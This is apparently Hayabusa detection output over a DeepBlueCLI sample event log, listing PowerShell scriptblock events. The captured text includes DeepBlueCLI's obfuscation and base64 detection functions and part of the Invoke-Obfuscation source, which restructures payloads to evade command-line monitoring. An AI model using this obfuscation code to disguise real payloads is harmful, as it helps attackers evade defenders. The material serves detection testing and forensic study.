($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.682 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.684 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.504 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.506 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.507 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:42.511 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:49.242 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:49.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:52.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:04.061 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:04.069 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:12:09.520 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:28.641 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:28.657 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:13:31.538 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:21.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:31.954 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:31.956 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.671 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.711 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.715 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.716 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.776 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' 